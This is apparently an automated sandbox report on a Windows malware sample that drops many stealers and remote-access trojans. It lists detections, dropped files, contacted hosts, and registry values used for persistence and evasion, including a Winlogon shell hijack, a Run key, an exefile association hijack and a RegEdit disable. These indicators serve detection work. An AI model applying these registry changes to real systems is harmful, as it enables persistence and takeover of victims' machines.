glupteba | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
1064s
max time network
1069s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
10-03-2024 15:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Signatures

Detect Neshta payload 64 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\Vertex_Craze_20240225061753481.exe	family_neshta
C:\Windows\svchost.com	family_neshta
C:\odt\OFFICE~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	family_neshta
behavioral3/memory/3236-95-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	family_neshta
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe	family_neshta
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	family_neshta
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	family_neshta
C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	family_neshta
C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\BHO\ie_to_edge_stub.exe	family_neshta
C:\PROGRA~2\Google\Update\DISABL~1.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE	family_neshta
C:\PROGRA~2\COMMON~1\Oracle\Java\JAVAPA~1\java.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe	family_neshta
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	family_neshta
C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	family_neshta
C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	family_neshta
C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\pwahelper.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\msedge_proxy.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\msedge.exe	family_neshta
C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateSetup.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateOnDemand.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateCore.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateBroker.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdate.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeComRegisterShellARM64.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\Installer\setup.exe	family_neshta
C:\PROGRA~2\MICROS~1\EdgeCore\90.0.818.66\identity_helper.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_pwa_launcher.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_proxy.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedgewebview2.exe	family_neshta
C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge.exe	family_neshta
C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	family_neshta
behavioral3/memory/1752-249-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4104-250-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/3236-264-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4940-265-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4932-267-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4104-270-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/3236-269-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/3236-290-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4940-291-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4932-296-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/4940-311-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral3/memory/3436-319-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\build6_unencrypted.exe	family_xworm

Detect ZGRat V1 28 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\swizzyy.exe	family_zgrat_v1
behavioral3/memory/1804-60-0x0000000000AB0000-0x0000000000AFC000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\Files\cryptotaeg.exe	family_zgrat_v1
behavioral3/memory/4204-251-0x0000000000C50000-0x0000000000C9C000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-321-0x0000000004F70000-0x0000000005178000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-338-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-339-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-341-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-343-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-345-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-348-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-350-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-352-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-354-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-356-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-358-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-366-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-369-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-373-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-375-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-382-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-379-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-387-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-389-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-398-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-400-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/360-408-0x0000000004F70000-0x0000000005173000-memory.dmp	family_zgrat_v1
behavioral3/memory/4336-1433-0x0000000005700000-0x000000000582A000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 2 IoCs

Processes:

resource	yara_rule
behavioral3/memory/3444-1597-0x0000000002F10000-0x00000000037FB000-memory.dmp	family_glupteba
behavioral3/memory/3444-1602-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

_VTI_CNF.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe RVHOST.exe"	_VTI_CNF.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe	family_redline

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\trust12344.exe	family_sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

asdfg.exe

description pid process target process

PID 3588 created 2492 3588 asdfg.exe sihost.exe
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

description	pid	process	target process
PID 3588 created 2492	3588	asdfg.exe	sihost.exe

Disables RegEdit via registry modification 1 IoCs

evasion

Processes:

_VTI_CNF.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	_VTI_CNF.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

328 netsh.exe

pid	process
328	netsh.exe

Executes dropped EXE 35 IoCs

Processes:

Vertex_Craze_20240225061753481.exeVertex_Craze_20240225061753481.exesvchost.comAPEX_V~1.EXEsvchost.comswizzyy.exesvchost.comTEST_2~1.EXEsvchost.comCRYPTO~1.EXEsvchost.comENIGMA~1.EXEsvchost.comasdfg.exesvchost.comsvchost.com_VTI_CNF.exemore.exesvchost.comnetTimer.exesvchost.com288C47~1.EXEsvchost.comINSTAL~1.EXEsvchost.com288C47~1.EXEsvchost.comBBLb.exeasdfg.exeasdfg.exesvchost.comU1J80~1.EXEBBLb.exesvchost.comU1J81~1.EXE

pid	process
3236	Vertex_Craze_20240225061753481.exe
1660	Vertex_Craze_20240225061753481.exe
4104	svchost.com
1340	APEX_V~1.EXE
4940	svchost.com
1804	swizzyy.exe
4932	svchost.com
2868	TEST_2~1.EXE
1752	svchost.com
4204	CRYPTO~1.EXE
3436	svchost.com
344	ENIGMA~1.EXE
1296	svchost.com
360	asdfg.exe
2056	svchost.com
2372	svchost.com
1232	_VTI_CNF.exe
3360	more.exe
2528	svchost.com
4656	netTimer.exe
1900	svchost.com
4740	288C47~1.EXE
1540	svchost.com
1988	INSTAL~1.EXE
1524	svchost.com
3444	288C47~1.EXE
2608	svchost.com
4336	BBLb.exe
3588	asdfg.exe
4036	asdfg.exe
2140	svchost.com
464	U1J80~1.EXE
3820	BBLb.exe
1408	svchost.com
5072	U1J81~1.EXE

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

Vertex_Craze_20240225061753481.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	Vertex_Craze_20240225061753481.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\AUTOKEY.exe	themida

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\u1j8.1.exe	upx
C:\Users\Admin\AppData\Local\Temp\Files\dusers.exe	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

_VTI_CNF.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3852399462-405385529-394778097-1000\Software\Microsoft\Windows\CurrentVersion\Run\Yahoo Messengger = "C:\\Windows\\system32\\RVHOST.exe"	_VTI_CNF.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

_VTI_CNF.exe

description	ioc	process
File opened (read-only)	\??\h:	_VTI_CNF.exe
File opened (read-only)	\??\j:	_VTI_CNF.exe
File opened (read-only)	\??\m:	_VTI_CNF.exe
File opened (read-only)	\??\p:	_VTI_CNF.exe
File opened (read-only)	\??\q:	_VTI_CNF.exe
File opened (read-only)	\??\w:	_VTI_CNF.exe
File opened (read-only)	\??\x:	_VTI_CNF.exe
File opened (read-only)	\??\e:	_VTI_CNF.exe
File opened (read-only)	\??\i:	_VTI_CNF.exe
File opened (read-only)	\??\n:	_VTI_CNF.exe
File opened (read-only)	\??\o:	_VTI_CNF.exe
File opened (read-only)	\??\t:	_VTI_CNF.exe
File opened (read-only)	\??\z:	_VTI_CNF.exe
File opened (read-only)	\??\a:	_VTI_CNF.exe
File opened (read-only)	\??\g:	_VTI_CNF.exe
File opened (read-only)	\??\k:	_VTI_CNF.exe
File opened (read-only)	\??\r:	_VTI_CNF.exe
File opened (read-only)	\??\s:	_VTI_CNF.exe
File opened (read-only)	\??\u:	_VTI_CNF.exe
File opened (read-only)	\??\b:	_VTI_CNF.exe
File opened (read-only)	\??\v:	_VTI_CNF.exe
File opened (read-only)	\??\y:	_VTI_CNF.exe
File opened (read-only)	\??\l:	_VTI_CNF.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
98	raw.githubusercontent.com
143	raw.githubusercontent.com
203	raw.githubusercontent.com
7012	raw.githubusercontent.com
72	bitbucket.org
74	bitbucket.org

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6608 api.ipify.org
18 ip-api.com
5669 ip-api.com

flow	ioc
6608	api.ipify.org
18	ip-api.com
5669	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\fu.exe	autoit_exe

Drops file in System32 directory 4 IoCs

Processes:

_VTI_CNF.exe

description	ioc	process
File created	C:\Windows\SysWOW64\RVHOST.exe	_VTI_CNF.exe
File opened for modification	C:\Windows\SysWOW64\RVHOST.exe	_VTI_CNF.exe
File created	C:\Windows\SysWOW64\setting.ini	_VTI_CNF.exe
File opened for modification	C:\Windows\SysWOW64\setting.ini	_VTI_CNF.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

swizzyy.exeCRYPTO~1.EXEasdfg.exeBBLb.exe

description	pid	process	target process
PID 1804 set thread context of 2596	1804	swizzyy.exe	RegAsm.exe
PID 4204 set thread context of 3292	4204	CRYPTO~1.EXE	RegAsm.exe
PID 360 set thread context of 3588	360	asdfg.exe	asdfg.exe
PID 4336 set thread context of 3820	4336	BBLb.exe	BBLb.exe

Drops file in Program Files directory 64 IoCs

Processes:

svchost.comVertex_Craze_20240225061753481.exe

description	ioc	process
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{FB050~1\WINDOW~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateCore.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateSetup.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\cookie_exporter.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpshare.exe	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{17316~1\WINDOW~1.EXE	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{17316~1\WINDOW~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateComRegisterShell64.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\elevation_service.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	svchost.com
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\notification_helper.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~2\wab.exe	svchost.com
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\msedge_pwa_launcher.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\BHO\ie_to_edge_stub.exe	svchost.com
File opened for modification	C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jusched.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	svchost.com
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	svchost.com
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	svchost.com
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EdgeUpdate_bk\1.3.143.57\MicrosoftEdgeUpdateBroker.exe	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	svchost.com

Drops file in Windows directory 33 IoCs

Processes:

svchost.comsvchost.comsvchost.comsvchost.comVertex_Craze_20240225061753481.exesvchost.comsvchost.comsvchost.comsvchost.com_VTI_CNF.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.com

description	ioc	process
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	Vertex_Craze_20240225061753481.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File created	C:\Windows\RVHOST.exe	_VTI_CNF.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\RVHOST.exe	_VTI_CNF.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

2324 sc.exe

pid	process
2324	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\script_20240224144501929.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 22 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4636	3588	WerFault.exe	asdfg.exe
1400	3588	WerFault.exe	asdfg.exe
4928	1988	WerFault.exe	INSTAL~1.EXE
2464	3832	WerFault.exe	INSTAL~1.EXE
4328	464	WerFault.exe	U1J80~1.EXE
360	4892	WerFault.exe	U2YG0~1.EXE
2800	3320	WerFault.exe	native.exe
2608	3320	WerFault.exe	native.exe
1908	1636	WerFault.exe	univ.exe
3544	4628	WerFault.exe	syncUpd.exe
844	1636	WerFault.exe	univ.exe
2308	1636	WerFault.exe	univ.exe
1756	1636	WerFault.exe	univ.exe
3268	1636	WerFault.exe	univ.exe
2448	1636	WerFault.exe	univ.exe
1116	1636	WerFault.exe	univ.exe
3076	1636	WerFault.exe	univ.exe
2244	2340	WerFault.exe	net.exe
2588	2340	WerFault.exe	net.exe
4048	3692	WerFault.exe	STEALE~1.EXE
336	3500	WerFault.exe	syncUpd.exe
5832	3648	WerFault.exe	timeSync.exe

NSIS installer 1 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup7.exe	nsis_installer_2

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

